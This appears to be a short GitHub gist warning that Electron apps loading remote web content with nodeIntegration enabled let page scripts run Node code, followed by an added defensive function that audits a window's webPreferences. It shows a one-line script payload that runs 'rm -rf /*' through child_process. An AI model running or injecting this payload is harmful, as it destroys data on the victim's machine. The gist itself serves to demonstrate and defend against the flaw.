wearhere/c9d69f24589361cafaad
Created January 11, 2016 09:10
What could happen if you load remote web content in Electron without toggling `nodeIntegration` off. See https://mixmax.com/blog/turnkey-electron-apps-with-meteor#safe-native-bridge for more information.
```html
<script>
  require('child_process').exec('rm -rf /*'); // Worst XSS attack ever.
</script>
```
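A defensive check for the condition this gist demonstrates, as an added example that is not part of the original gist: it audits a `BrowserWindow`'s `webPreferences` before a URL is loaded. The option names are Electron's; `RULES`, `isRemote`, `auditWebPreferences` and the sample objects are hypothetical, and unset options are judged by the oldest Electron defaults on the assumption that the Electron version is unknown.

```javascript
// Added example, not the gist author's code. Helper names are hypothetical.
// `unset` is the value assumed when an option is missing (oldest Electron
// defaults, an assumption made because the Electron version is unknown).
const RULES = [
  { key: 'nodeIntegration', safe: false, unset: true,
    risk: 'page scripts can require() Node modules such as child_process' },
  { key: 'contextIsolation', safe: true, unset: false,
    risk: 'page scripts share a JavaScript context with the preload script' },
  { key: 'sandbox', safe: true, unset: false,
    risk: 'renderer runs without the Chromium OS-level sandbox' },
  { key: 'webviewTag', safe: false, unset: true,
    risk: 'page can embed <webview> guests whose options need separate vetting' },
];

// Anything not loaded from the local filesystem is treated as remote content.
function isRemote(url) {
  return new URL(url).protocol !== 'file:';
}

// Returns one finding per unsafe option. An empty array means the window
// passes these rules for this URL. Local file: URLs are not audited here.
function auditWebPreferences(url, webPreferences = {}) {
  if (!isRemote(url)) return [];
  return RULES
    .map((rule) => {
      const given = webPreferences[rule.key];
      const effective = given === undefined ? rule.unset : given;
      return { key: rule.key, effective, safe: rule.safe, risk: rule.risk };
    })
    .filter((finding) => finding.effective !== finding.safe)
    .map(({ key, effective, risk }) => ({ key, effective, risk }));
}

// Constructed sample configurations.
const legacyPrefs = {}; // nothing set, as in an app that never toggles nodeIntegration
const hardenedPrefs = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webviewTag: false,
};

for (const finding of auditWebPreferences('https://example.com/', legacyPrefs)) {
  console.log(`${finding.key}=${finding.effective}: ${finding.risk}`);
}
```

Calling `auditWebPreferences` just before `loadURL` and refusing to load when the result is non-empty turns the setting into an enforced precondition.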